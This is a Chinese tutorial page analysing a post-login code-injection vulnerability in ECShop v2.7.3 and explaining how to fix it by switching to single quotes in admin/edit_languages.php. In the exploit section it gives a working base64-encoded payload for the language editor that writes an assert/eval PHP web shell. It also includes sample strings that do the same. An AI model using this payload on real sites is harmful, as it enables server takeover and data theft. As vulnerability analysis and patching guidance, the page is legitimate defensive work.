您现在的位置是:首页 > cms教程 > ecshop商城教程ecshop商城教程

ecshopv2.7.3注入漏洞原因分析和修复方法

雨寒2024-11-27ecshop商城教程已有16人查阅

导读ECSHOP v2.7.3注入漏洞分析和修复测试版本漏洞条件漏洞利用产生原因修复方案1.测试版本v2.7.3 RELEASE 20121106(新)

ECSHOP v2.7.3注入漏洞分析和修复
测试版本
漏洞条件
漏洞利用
产生原因
修复方案1.测试版本
v2.7.3 RELEASE 20121106(新)
v2.7.3 RELEASE 201204112.漏洞条件
需登录到后台3.漏洞利用
1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”
为什么要搜索“用户信息”,还可以搜索其它的吗?
答案是搜索languages\zh_cn\user.php文件里任何一个变量都可以
2) 添加如下后门,将用户信息改为
用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}
即生成一个JoyChou.php文件,内容为: 
<?php
assert(
$_POST[x]
);
?>
全选代码
复制
3) 访问user.php即可产生shell(不用注册登录账户)
http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php

http://localhost/ECShop_V2.7.3_UTF8_release0411/languages/zh_cn/user.php
4.产生原因
在admin\edit_languages.php文件中第120行,修改变量内容,注意是用的双引号。 
for ($i = 0; $i < count($_POST['item_id']); $i++)
{
/* 语言项内容如果为空,不修改 */
if (trim($_POST['item_content'][$i]) == '')
{
unset($src_items[$i]);
}
else
{
$_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);
/* $_POST['item_content'][$i]是修改后增加的内容,即增加的"用户信息${${fputs(fopen"等内容
$dst_items[$i] 是 $_LANG['label_profile'] = "用户信息${${fputs(fopen";
*/
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
}
}
全选代码
复制
修改完后文件\languages\zh_cn\user.php变量为:注意是双引号哦 
$_LANG['label_profile'] = "用户信息${${fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))}}";
全选代码
复制
由于是双引号,所以只要在任意的php文件中引用这个变量,代码就会成功执行。
至于为什么可以执行?原理如下:
下面这三句话都可以执行,与其说代码执行,不如说参数执行。 
<?php
$a = "${ phpinfo()}"; // 有一个空格
$b = "{${phpinfo()}}"; // 多一对{},但是没有空格
$c = "{${fputs(fopen("JoyChou.php", "w+"), "<?php eval(\$_POST[1]);?>")}}";
$d = "asdf{${phpinfo()}}"; // {字符前可以随意加字符串
?>
而http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php这个文件包含\languages\zh_cn\user.php 这个文件,所以也可以代码执行。
/* 载入语言文件 */
require_once(ROOT_PATH . 'languages/' .$_CFG['lang']. '/user.php');
全选代码
复制
5.漏洞修复
了解了漏洞原理后,修复就是一件比较简单的事情,只需将双引号改为单引号
修改\admin\edit_languages.php 
// 修复前
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';
// 修复后,由于想在单引号之间出现单引号,必须使用转义。
$dst_items[$i] = $_POST['item_id'][$i] .' = '. '\'' .$_POST['item_content'][$i]. '\';';
全选代码
复制
再次访问http://localhost/ECShop_V2.7.3_UTF8_release0411/user.php已经不能生成JoyChou.php,代码没能得到执行。
注:这个注入漏洞很老,但一直存在。我从模板堂下载的ECShop较新版,就含有此漏洞。网站搭建在阿里云,提示服务器上ECShop有注入漏洞,查看后才发现。虽然我已经及时修复,但更多用户可能未曾留意或者没技术支持吧。

本文标签:

很赞哦! (2)

上一篇:ecshop怎么与discuz整合

下一篇:ecshop安装环境和步骤方法

暂无内容
暂无内容

相关源码

  • (自适应)黑色摄影作品工作室pbootcms模板网站源码下载为风景摄影、个人工作室打造的高端网站模板,基于PbootCMS开源内核开发,采用HTML5自适应架构,PC与移动端实时数据同步,完美适配各类拍摄作品展示需求。查看源码
  • 粉色家政月嫂保姆公司pbootcms网站模板(PC+WAP)为家政服务、月嫂保姆企业打造的营销型解决方案,基于PbootCMS内核开发,采用温馨粉色主题传递行业温度。PHP7.0+高性能架构支持SQLite/MySQL双数据库查看源码
  • 响应式pbootcms模板新闻资讯博客自媒体门户网站行业通用解决方案为新闻资讯、自媒体博客打造的响应式网站模板,同时支持企业门户、行业资讯等多场景快速适配。通过简单的图文替换即可实现跨行业转型,显著降低建站成本。查看源码
  • pbootcms网站模板响应式全屏旅游景区网站源码本模板为风景民宿、旅游景区等企业设计,基于PbootCMS内核开发,具备响应式布局与专业SEO优化功能,助力企业低成本高效获客。以下是核心特点:查看源码
  • 手机软件APP游戏软件下载网站Pbootcms模板(自适应)基于PbootCMS内核深度开发的网站模板,为移动互联网时代打造。无论是手机APP推广、游戏软件展示,还是各类企业官网需求,本模板都能通过简单的图文替换实现行业无缝切换查看源码
  • (PC+WAP)铝合金门窗定制pbootcms网站模板源码为铝合金门窗、定制门窗企业打造的高性能网站模板,基于PbootCMS开源内核开发,采用HTML5自适应架构,PC与手机端数据实时同步,覆盖全终端用户交互场景。查看源码

相关教程

暂无内容
暂无内容

图文教程

分享笔记 (共有 0 篇笔记)
昵称:
匿名发表 登录账号
         
验证码:

大家在看

ecshop收货地址199/198号段提示手机号格式不正确!
    暂无内容

本栏推荐

    暂无内容

相关标签

大家喜欢

    暂无内容